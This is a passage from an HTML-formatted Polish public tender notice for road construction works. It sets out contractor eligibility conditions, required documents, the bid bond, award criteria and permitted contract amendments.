mowa w art. 67 ust. 1 pkt. 6 p.z.p., polegających na powtórzeniu zamówień podobnych do przedmiotu zamówienia podstawowego i zgodnych z nim, których całkowita, łączna wartość nie przekroczy 20% wartości zamówienia podstawowego. Zakres możliwych do udzielenia zamówień uzupełniających, może polegać na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego, w szczególności gdy zaistnieje uzasadniona potrzeba rozszerzenia przedmiotu zamówienia poprzez wykonanie robót budowlanych dla tego samego wykonywanego obiektu lub jego otoczenia, w obszarze zakładanego jego oddziaływania. Roboty te mogą polegać w szczególności na drogowych, robotach instalacyjnych, sanitarnych związanych robotami w zakresie dróg i obejmować:a.	wydłużenie poszczególnych odcinków dróg lub ciągów pieszo - rowerowych realizowanych w ramach zamówienia podstawowego,b.	zwiększeniu ilości urządzeń technicznych służących obsłudze tych dróg lub ciągów pieszo - jezdnych,c.	wykonanie nowych odcinków dróg lub ciągów pieszo - jezdnych wraz z urządzeniami koniecznymi do ich obsługi;d.	zwiększenie zakresu robót drogowych lub w zakresie ciągów pieszo – jezdnych związanych z zakresem drogowym.Warunki umowne na jakich zostaną udzielone ewentualne zamówienia uzupełniające: podstawą do negocjacji warunków udzielania zamówienia będzie wzór umowy nie odbiegający istotnie od postanowień wzoru umowy stanowiącego załącznik nr 4 do niniejszej SIWZ.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-11-15</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Posiadanie środków finansowych lub zdolności kredytowej w wysokości wynoszącej co najmniej 3 000.000,00 PLN brutto, Posiadanie przychodu ze sprzedaży netto w ciągu ostatniego roku obrotowego nie mniejszego niż 2.000.000,00 złotych.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. W zakresie posiadania wiedzy i doświadczenia wyrażające się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert:robót budowlanych lub roboty budowlanej w zakresie na budowy lub przebudowy lub rozbudowy dróg publicznych o łącznej wartości minimum 4.000.000,00 złotych brutto (słownie: cztery miliony złotych 00/100),2. dysponuje następującymi osobami przeznaczonymi do realizacji zamówienia:kierownikiem budowy posiadającym:a)	uprawnienia zawodowe do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej,b)	doświadczenie zawodowe wyrażające się wykonywaniem funkcji kierownika budowy dla robót budowlanych lub roboty budowlanej w zakresie dróg o łącznej wartości minimum 2.000.000,00 złotych brutto (słownie: dwa miliony złotych 00/100), W odniesieniu do powyższych wymagań stawianych kierownikom budowy oraz kierownikom branżowym właściwe są uprawnienia budowlane wydawane po 1994 roku (tj. zgodne z wymogami ustawy Prawo budowlane (tekst pierwotny: Dz. U. 1994 r. Nr 89 poz. 414) (tekst jednolity t.j. Dz. U. z 2019 r. poz. 1186, 1309, 1524, 1696, 1712, 1815, 2166, 2170.)Funkcje kierowników budowy oraz kierowników branżowych mogą również wykonywać osoby posiadające ważne uprawnienia budowlane wydane na podstawie obowiązujących przed 01.01.1995r. właściwych przepisów jeżeli uprawnienia te pozwalają na pełnienie funkcji o której mowa odpowiednio w punkcie 2.Funkcje kierowników budowy oraz kierowników branżowych mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. t.j. Dz. U. z 2018 r. poz. 2272, z 2019 r. poz. 534, 577Kierownik budowy oraz kierownicy robót branżowych muszą być wpisani na listę członków właściwej izby samorządu zawodowego i posiadać aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty; 2. wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy; 3. sprawozdanie finansowe albo jego części, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami prawa kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiednio z opinią obadanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających na przykład obroty oraz aktywa i zobowiązania - za okres nie dłuższy niż ostatni jeden rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres; 4. informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lzdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Do oferty Wykonawca dołączyć ma aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz oświadczenie dotyczące podstaw do wykluczenia – wzory oświadczeń stanowią odpowiednio załączniki nr 2 oraz nr 3 do specyfikacji istotnych warunków zamówienia. Informacje zawarte w oświadczeniach stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Wykonawca,który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw do wykluczenia oraz spełniania, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informację o tych podmiotach w oświadczeniach o których mowa wyżej. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy pzp, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24ust. 1 pkt 23 ustawy p.z.p. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Każda oferta musi być zabezpieczona wadium w wysokości 200.000,00 złotych (słownie: dwieście tysięcy złotych).</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>KWALIFIKACJE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI ZAMÓWIENIA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>12,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>WYDŁUŻONY OKRES GWARANCJI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>28,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiany niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy są niedopuszczalne, chyba że zajdzie co najmniej jedna z następujących okoliczności:1)	zmiany mieszczą się w okolicznościach określonych w ust. 2;2) zmiany dotyczą realizacji dodatkowych dostaw, usług lub robót budowlanych od Wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:a)	zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności usług, zamówionych w ramach zamówienia podstawowego,b)	zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego,c)	wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie;3) zostały spełnione łącznie następujące warunki:a)	konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, a) wartość zmiany nie przekracza 50% wartości określonej pierwotnie w Umowie;4)	Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy wykonawca:a)	w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,b)	w wyniku przejęcia przez Zamawiającego zobowiązań wykonawcy względem jego podwykonawców;5)	łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo Zamówień Publicznych i jest mniejsza od 15% wartości zamówienia określonej pierwotnie w Umowie;6)	zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu art. 144 ust. 1e ustawy Prawo zamówień publicznych.2.	Istotne zmiany treści umowy mogą dotyczyć lub wynikać z następujących okoliczności:1)	zaistnieją okoliczności uniemożliwiające terminowe wykonanie Umowy, a w tym::a)	działania podmiotów trzecich, np. przedłużanie terminów wydania przez organy administracji lub inne podmioty wymaganych badań, opinii, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę;b)	wystąpienie Siły Wyższej,c)	działań osób/podmiotów trzecich uniemożliwiających, utrudniających wykonanie robót budowlanych, które to działania nie są zawinione przez którąkolwiek ze Stron umowy; wystąpienie niekorzystnych warunków atmosferycznych odbiegających znacząco od typowych, potwierdzonych przez odpowiednie dane Instytutu Meteorologii i Gospodarki Wodnej, a uniemożliwiających prowadzenie robót lub wykonanie procedur odbiorowych (przeprowadzanie 